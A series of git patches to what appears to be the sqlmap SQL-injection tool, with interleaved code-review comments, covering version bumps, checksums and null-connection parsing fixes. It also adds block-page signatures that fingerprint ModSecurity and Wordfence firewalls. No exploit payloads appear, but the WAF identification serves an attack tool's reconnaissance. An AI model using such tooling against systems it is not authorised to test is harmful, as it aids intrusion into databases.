@@ -26,6 +28,11 @@ def _(*args, **kwargs): return _ def stackedmethod(f): + """ + Method using pushValue/popValue functions (fallback function for stack realignment) + """ + + @functools.wraps(f) def _(*args, **kwargs): threadData = getCurrentThreadData() originalLevel = len(threadData.valueStack) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2aea222710e..5aa9f9800f8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.43" +VERSION = "1.2.12.44" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 330e65059de..0c1c5975a5e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -33,7 +33,7 @@ c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -4086fb55f42e27de5330505605baad0f lib/core/decorators.py +2e62f7c5e89442e5a76e6d797d54be2c lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py 760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2e1f9bb9dce79f8681b8e1c83591d346 lib/core/settings.py +659309102048735a13747b78c300120e lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 
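Review bot: The new docstring, `Method using pushValue/popValue functions (fallback function for stack realignment)`, does not tell the caller what the decorator does. From the visible body it records `len(threadData.valueStack)` on entry, presumably to restore the stack to that depth afterwards; suggest `Decorator for functions that use pushValue()/popValue(): remembers the depth of the thread's value stack on entry and realigns it on exit, so an exception inside the wrapped function cannot leave stale entries behind` — confirm the exit handling against the rest of `_`, which lies outside this hunk.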
From b31c264a590afa60bf6ce03a34048949aab8649c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 20:49:40 +0100 Subject: [PATCH 419/428] Minor update --- extra/wafdetectify/wafdetectify.py | 4 +++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index 68cdcb93bdf..014854d52cd 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -99,7 +99,7 @@ def main(): WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower()) - print colorize("[i] %d WAF scripts loaded" % len(WAF_FUNCTIONS)) + print colorize("[i] checking '%s'..." % sys.argv[1]) found = False for function, product in WAF_FUNCTIONS: @@ -115,5 +115,7 @@ def main(): print + exit(int(not found)) + if __name__ == "__main__": main() diff --git a/lib/core/settings.py b/lib/core/settings.py index 5aa9f9800f8..ec01862c0ac 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.44" +VERSION = "1.2.12.45" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0c1c5975a5e..fd86248a9f4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
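Review bot: `exit(int(not found))` relies on the `exit` name injected by the `site` module, which is absent under `python -S` and in some frozen or embedded interpreters; `sys` is already in use a few lines up for `sys.argv[1]`, so make it `sys.exit(int(not found))`. A short comment on the convention helps anyone scripting around this tool: `# exit status 0 = WAF detected, 1 = nothing found`. The rest of main() is outside the hunk.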
@@ -21,7 +21,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py +d2fe1ac374de3c2d7729152cb8c80ce8 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py d4582467b0735525d8d8bdc0396ec87f lib/controller/checks.py 197bdf07f8ea15ecc7e0dafea4f9ae2f lib/controller/controller.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -659309102048735a13747b78c300120e lib/core/settings.py +bcd013acb00d49bb4ed6a39e3e4672d0 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From c799e794f2a9ad00216a879451f66d13de521894 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 29 Dec 2018 20:40:49 +0100 Subject: [PATCH 420/428] Minor update of modsecurity.py --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/modsecurity.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index ec01862c0ac..6f8e40035fd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.45" +VERSION = "1.2.12.46" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fd86248a9f4..c52676689b0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bcd013acb00d49bb4ed6a39e3e4672d0 lib/core/settings.py +7230ffa8fb85a6cd1234850be5bd2a1a lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -433,7 +433,7 @@ ade1299c435db7b9e35cf1166ed9d859 waf/generic.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py 898f53c12133da3e946301f4aa97d538 waf/knownsec.py 15a50edd48961ea168648a370f42e123 waf/kona.py -b17a154fe7959619eaafffa60e14199f waf/modsecurity.py +69cadf95303d60ac0a228cf60dfdba73 waf/modsecurity.py d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py cb2f1516867684042f580e02138463de waf/netscaler.py diff --git a/waf/modsecurity.py b/waf/modsecurity.py index 6b13043ef10..64d36264177 100644 --- a/waf/modsecurity.py +++ b/waf/modsecurity.py @@ -18,7 +18,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) retval = re.search(r"Mod_Security|NOYB", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None - retval |= any(_ in (page or "") for _ in ("This error was generated by Mod_Security", "One or more things in your request were suspicious", "rules of the mod_security module")) + retval |= any(_ in (page or "") for _ in ("This error was generated by Mod_Security", "One or more things in your request were suspicious", "rules of the mod_security module", "The page you are trying to access is restricted due to a security rule")) if retval: break From 586c461ae6b80730376cf71688127bdce44fafdf Mon Sep 17 00:00:00 2001 
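Review bot: The added signature `The page you are trying to access is restricted due to a security rule` is matched as a case-sensitive substring of the body, while the `Server` header check on the line above uses `re.I`, so a site that capitalises its block page differently slips through. Lower-casing once keeps the two checks consistent: `body = (page or "").lower()` and `retval |= any(_ in body for _ in (...lower-cased phrases...))`. That phrase is also generic enough that it may be emitted by products other than ModSecurity, so a comment marking it as a weaker indicator would help future tuning. The loop and `detect()` continue beyond the hunk.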
From: Miroslav Stampar Date: Mon, 31 Dec 2018 01:01:19 +0100 Subject: [PATCH 421/428] Minor patch --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f8e40035fd..25419dd590d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.46" +VERSION = "1.2.12.47" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 967c5916291..e9e0899ad39 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1266,7 +1266,7 @@ def _randomizeParameter(paramString, randomParameter): finally: kb.pageCompress = popValue() - if not pageLength: + if pageLength is None: try: page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) except MemoryError: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c52676689b0..8452b99385c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
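Review bot: Switching to `if pageLength is None:` makes a `Content-Length: 0` (or a `Content-Range` total of 0) count as a valid null-connection result instead of triggering the full fetch, which is presumably the intent, but it only works if `pageLength` is initialised to `None` rather than `0` above this hunk — please verify, since the initialisation is outside the diff. A comment would save the next reader the same question: `# 0 is a legitimate length; only a missing/unparseable header falls back to a full request`.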
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7230ffa8fb85a6cd1234850be5bd2a1a lib/core/settings.py +22ef53fbda55651f76cb0e3f867ce6bc lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 67c035eda3066b44c592b2f602e44b3e lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -bd5e2ad9dd0505bdaae180b323a8fa34 lib/request/connect.py +b003a50d7de068afbe540e830df8682d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From e18b41fc82ce99ab3dd1155a7da5467ab710c371 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 31 Dec 2018 01:03:40 +0100 Subject: [PATCH 422/428] Fixes #3421 --- lib/core/settings.py | 2 +- lib/request/connect.py | 11 +++++++---- txt/checksum.md5 | 4 ++-- 3 files changed, 10 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 25419dd590d..1ea425df99a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.47" +VERSION = "1.2.12.48" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/request/connect.py b/lib/request/connect.py index e9e0899ad39..eac8a2c8581 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1259,10 +1259,13 @@ def _randomizeParameter(paramString, randomParameter): _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: - if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): - pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): - pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) + try: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): + pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH].split(',')[0]) + elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): + pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) + except ValueError: + pass finally: kb.pageCompress = popValue() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8452b99385c..d68daa63235 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -22ef53fbda55651f76cb0e3f867ce6bc lib/core/settings.py +ee218563ec023478311e55a30e2ea443 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 
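Review bot: The new `except ValueError: pass` silently discards a malformed `Content-Length`/`Content-Range`, leaving `pageLength` as `None` so the code below falls back to a full request — acceptable behaviour, but worth a debug log so the fallback is visible when tuning null connection, plus a comment on the `.split(',')[0]`: `# duplicate Content-Length headers arrive comma-joined; take the first (#3421)`. Note that `int()` accepts a negative value, so `Content-Length: -1` yields a negative `pageLength` that is not `None`; `if pageLength is not None and pageLength < 0: pageLength = None` inside the `try` closes that. A comma-joined Content-Length is also a classic sign of disagreeing proxies, so choosing the first value is a decision worth stating. The `try/finally` frame begins above this hunk.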
@@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 67c035eda3066b44c592b2f602e44b3e lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -b003a50d7de068afbe540e830df8682d lib/request/connect.py +2fe9e5118553f9b2b37ca33d5f85a401 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 45d0010323a1ff4ee3c21de59f4e8ab3972cdf2c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 31 Dec 2018 01:20:43 +0100 Subject: [PATCH 423/428] Most probably solves #3422 --- lib/core/option.py | 4 ++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 23dce9cba4e..85fcd3806fe 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2271,6 +2271,10 @@ def _basicOptionValidation(): errMsg = "option '-d' is incompatible with option '-u' ('--url')" raise SqlmapSyntaxException(errMsg) + if conf.direct and conf.dbms: + errMsg = "option '-d' is incompatible with option '--dbms'" + raise SqlmapSyntaxException(errMsg) + if conf.identifyWaf and conf.skipWaf: errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'" raise SqlmapSyntaxException(errMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1ea425df99a..ce19e72a6bd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.48" +VERSION = "1.2.12.49" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d68daa63235..6e7ab0bcb8e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -9e12c63430c653970cbc4c6bc6984784 lib/core/option.py +b75d17fef2c6675b53a8874484ea771f lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ee218563ec023478311e55a30e2ea443 lib/core/settings.py +029c708c75256a97c39c14e24e62ba08 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 12427ff6f87e6aeb762b82617d70bdf71b1970ed Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 Jan 2019 21:29:59 +0100 Subject: [PATCH 424/428] Minor update --- waf/wordfence.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/waf/wordfence.py b/waf/wordfence.py index 0a941c9245f..dadb8151fa4 100644 --- a/waf/wordfence.py +++ b/waf/wordfence.py 
@@ -16,8 +16,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, _, _ = get_page(get=vector) - retval = re.search(r"This response was generated by Wordfence", page or "", re.I) is not None - retval |= re.search(r"Your access to this site has been limited", page or "", re.I) is not None + retval = any(_ in (page or "") for _ in ("A potentially unsafe operation has been detected in your request to this site", "Generated by Wordfence", "Your access to this site has been limited", "This response was generated by Wordfence")) if retval: break From 590e8ed5aef8cb0b47ef85ebc3819be6c7f282bc Mon Sep 17 00:00:00 2001 
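Review bot: Replacing the two `re.search(..., re.I)` calls with plain `in` tests drops case-insensitive matching, so a page carrying `generated by Wordfence` or `YOUR ACCESS TO THIS SITE HAS BEEN LIMITED` in a casing different from the tuple no longer triggers — a regression rather than a tidy-up. Either lower-case once, `body = (page or "").lower()` and compare against lower-cased phrases, or keep `re.I`: `retval = any(re.search(_, page or "", re.I) for _ in (...))`. If `re` is no longer used elsewhere in this file the import becomes dead; it sits outside the hunk. `detect()` continues past the hunk.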
From: Miroslav Stampar Date: Sat, 5 Jan 2019 21:38:52 +0100 Subject: [PATCH 425/428] update_copyright_year() --- LICENSE | 2 +- extra/__init__.py | 2 +- extra/beep/__init__.py | 2 +- extra/beep/beep.py | 2 +- extra/cloak/__init__.py | 2 +- extra/cloak/cloak.py | 2 +- extra/dbgtool/__init__.py | 2 +- extra/dbgtool/dbgtool.py | 2 +- extra/safe2bin/__init__.py | 2 +- extra/safe2bin/safe2bin.py | 2 +- extra/shutils/duplicates.py | 2 +- extra/shutils/pycodestyle.sh | 2 +- extra/shutils/pypi.sh | 4 ++-- extra/shutils/regressiontest.py | 2 +- extra/sqlharvest/__init__.py | 2 +- extra/sqlharvest/sqlharvest.py | 2 +- extra/wafdetectify/__init__.py | 2 +- extra/wafdetectify/wafdetectify.py | 2 +- lib/__init__.py | 2 +- lib/controller/__init__.py | 2 +- lib/controller/action.py | 2 +- lib/controller/checks.py | 2 +- lib/controller/controller.py | 2 +- lib/controller/handler.py | 2 +- lib/core/__init__.py | 2 +- lib/core/agent.py | 2 +- lib/core/bigarray.py | 2 +- lib/core/common.py | 2 +- lib/core/convert.py | 2 +- lib/core/data.py | 2 +- lib/core/datatype.py | 2 +- lib/core/decorators.py | 2 +- lib/core/defaults.py | 2 +- lib/core/dicts.py | 2 +- lib/core/dump.py | 2 +- lib/core/enums.py | 2 +- lib/core/exception.py | 2 +- lib/core/log.py | 2 +- lib/core/option.py | 2 +- lib/core/optiondict.py | 2 +- lib/core/patch.py | 2 +- lib/core/profiling.py | 2 +- lib/core/readlineng.py | 2 +- lib/core/replication.py | 2 +- lib/core/revision.py | 2 +- lib/core/session.py | 2 +- lib/core/settings.py | 2 +- lib/core/shell.py | 2 +- lib/core/subprocessng.py | 2 +- lib/core/target.py | 2 +- lib/core/testing.py | 2 +- lib/core/threads.py | 2 +- lib/core/unescaper.py | 2 +- lib/core/update.py | 2 +- lib/core/wordlist.py | 2 +- lib/parse/__init__.py | 2 +- lib/parse/banner.py | 2 +- lib/parse/cmdline.py | 2 +- lib/parse/configfile.py | 2 +- lib/parse/handler.py | 2 +- lib/parse/headers.py | 2 +- lib/parse/html.py | 2 +- lib/parse/payloads.py | 2 +- lib/parse/sitemap.py | 2 +- 
lib/request/__init__.py | 2 +- lib/request/basic.py | 2 +- lib/request/basicauthhandler.py | 2 +- lib/request/comparison.py | 2 +- lib/request/connect.py | 2 +- lib/request/direct.py | 2 +- lib/request/dns.py | 2 +- lib/request/httpshandler.py | 2 +- lib/request/inject.py | 2 +- lib/request/methodrequest.py | 2 +- lib/request/pkihandler.py | 2 +- lib/request/rangehandler.py | 2 +- lib/request/redirecthandler.py | 2 +- lib/request/templates.py | 2 +- lib/takeover/__init__.py | 2 +- lib/takeover/abstraction.py | 2 +- lib/takeover/icmpsh.py | 2 +- lib/takeover/metasploit.py | 2 +- lib/takeover/registry.py | 2 +- lib/takeover/udf.py | 2 +- lib/takeover/web.py | 2 +- lib/takeover/xp_cmdshell.py | 2 +- lib/techniques/__init__.py | 2 +- lib/techniques/blind/__init__.py | 2 +- lib/techniques/blind/inference.py | 2 +- lib/techniques/dns/__init__.py | 2 +- lib/techniques/dns/test.py | 2 +- lib/techniques/dns/use.py | 2 +- lib/techniques/error/__init__.py | 2 +- lib/techniques/error/use.py | 2 +- lib/techniques/union/__init__.py | 2 +- lib/techniques/union/test.py | 2 +- lib/techniques/union/use.py | 2 +- lib/utils/__init__.py | 2 +- lib/utils/api.py | 2 +- lib/utils/brute.py | 2 +- lib/utils/crawler.py | 2 +- lib/utils/deps.py | 2 +- lib/utils/getch.py | 2 +- lib/utils/har.py | 2 +- lib/utils/hash.py | 2 +- lib/utils/hashdb.py | 2 +- lib/utils/htmlentities.py | 2 +- lib/utils/pivotdumptable.py | 2 +- lib/utils/progress.py | 2 +- lib/utils/purge.py | 2 +- lib/utils/search.py | 2 +- lib/utils/sqlalchemy.py | 2 +- lib/utils/timeout.py | 2 +- lib/utils/versioncheck.py | 2 +- lib/utils/xrange.py | 2 +- plugins/__init__.py | 2 +- plugins/dbms/__init__.py | 2 +- plugins/dbms/access/__init__.py | 2 +- plugins/dbms/access/connector.py | 2 +- plugins/dbms/access/enumeration.py | 2 +- plugins/dbms/access/filesystem.py | 2 +- plugins/dbms/access/fingerprint.py | 2 +- plugins/dbms/access/syntax.py | 2 +- plugins/dbms/access/takeover.py | 2 +- plugins/dbms/db2/__init__.py | 2 +- 
plugins/dbms/db2/connector.py | 2 +- plugins/dbms/db2/enumeration.py | 2 +- plugins/dbms/db2/filesystem.py | 2 +- plugins/dbms/db2/fingerprint.py | 2 +- plugins/dbms/db2/syntax.py | 2 +- plugins/dbms/db2/takeover.py | 2 +- plugins/dbms/firebird/__init__.py | 2 +- plugins/dbms/firebird/connector.py | 2 +- plugins/dbms/firebird/enumeration.py | 2 +- plugins/dbms/firebird/filesystem.py | 2 +- plugins/dbms/firebird/fingerprint.py | 2 +- plugins/dbms/firebird/syntax.py | 2 +- plugins/dbms/firebird/takeover.py | 2 +- plugins/dbms/h2/__init__.py | 2 +- plugins/dbms/h2/connector.py | 2 +- plugins/dbms/h2/enumeration.py | 2 +- plugins/dbms/h2/filesystem.py | 2 +- plugins/dbms/h2/fingerprint.py | 2 +- plugins/dbms/h2/syntax.py | 2 +- plugins/dbms/h2/takeover.py | 2 +- plugins/dbms/hsqldb/__init__.py | 2 +- plugins/dbms/hsqldb/connector.py | 2 +- plugins/dbms/hsqldb/enumeration.py | 2 +- plugins/dbms/hsqldb/filesystem.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 2 +- plugins/dbms/hsqldb/syntax.py | 2 +- plugins/dbms/hsqldb/takeover.py | 2 +- plugins/dbms/informix/__init__.py | 2 +- plugins/dbms/informix/connector.py | 2 +- plugins/dbms/informix/enumeration.py | 2 +- plugins/dbms/informix/filesystem.py | 2 +- plugins/dbms/informix/fingerprint.py | 2 +- plugins/dbms/informix/syntax.py | 2 +- plugins/dbms/informix/takeover.py | 2 +- plugins/dbms/maxdb/__init__.py | 2 +- plugins/dbms/maxdb/connector.py | 2 +- plugins/dbms/maxdb/enumeration.py | 2 +- plugins/dbms/maxdb/filesystem.py | 2 +- plugins/dbms/maxdb/fingerprint.py | 2 +- plugins/dbms/maxdb/syntax.py | 2 +- plugins/dbms/maxdb/takeover.py | 2 +- plugins/dbms/mssqlserver/__init__.py | 2 +- plugins/dbms/mssqlserver/connector.py | 2 +- plugins/dbms/mssqlserver/enumeration.py | 2 +- plugins/dbms/mssqlserver/filesystem.py | 2 +- plugins/dbms/mssqlserver/fingerprint.py | 2 +- plugins/dbms/mssqlserver/syntax.py | 2 +- plugins/dbms/mssqlserver/takeover.py | 2 +- plugins/dbms/mysql/__init__.py | 2 +- 
plugins/dbms/mysql/connector.py | 2 +- plugins/dbms/mysql/enumeration.py | 2 +- plugins/dbms/mysql/filesystem.py | 2 +- plugins/dbms/mysql/fingerprint.py | 2 +- plugins/dbms/mysql/syntax.py | 2 +- plugins/dbms/mysql/takeover.py | 2 +- plugins/dbms/oracle/__init__.py | 2 +- plugins/dbms/oracle/connector.py | 2 +- plugins/dbms/oracle/enumeration.py | 2 +- plugins/dbms/oracle/filesystem.py | 2 +- plugins/dbms/oracle/fingerprint.py | 2 +- plugins/dbms/oracle/syntax.py | 2 +- plugins/dbms/oracle/takeover.py | 2 +- plugins/dbms/postgresql/__init__.py | 2 +- plugins/dbms/postgresql/connector.py | 2 +- plugins/dbms/postgresql/enumeration.py | 2 +- plugins/dbms/postgresql/filesystem.py | 2 +- plugins/dbms/postgresql/fingerprint.py | 2 +- plugins/dbms/postgresql/syntax.py | 2 +- plugins/dbms/postgresql/takeover.py | 2 +- plugins/dbms/sqlite/__init__.py | 2 +- plugins/dbms/sqlite/connector.py | 2 +- plugins/dbms/sqlite/enumeration.py | 2 +- plugins/dbms/sqlite/filesystem.py | 2 +- plugins/dbms/sqlite/fingerprint.py | 2 +- plugins/dbms/sqlite/syntax.py | 2 +- plugins/dbms/sqlite/takeover.py | 2 +- plugins/dbms/sybase/__init__.py | 2 +- plugins/dbms/sybase/connector.py | 2 +- plugins/dbms/sybase/enumeration.py | 2 +- plugins/dbms/sybase/filesystem.py | 2 +- plugins/dbms/sybase/fingerprint.py | 2 +- plugins/dbms/sybase/syntax.py | 2 +- plugins/dbms/sybase/takeover.py | 2 +- plugins/generic/__init__.py | 2 +- plugins/generic/connector.py | 2 +- plugins/generic/custom.py | 2 +- plugins/generic/databases.py | 2 +- plugins/generic/entries.py | 2 +- plugins/generic/enumeration.py | 2 +- plugins/generic/filesystem.py | 2 +- plugins/generic/fingerprint.py | 2 +- plugins/generic/misc.py | 2 +- plugins/generic/search.py | 2 +- plugins/generic/syntax.py | 2 +- 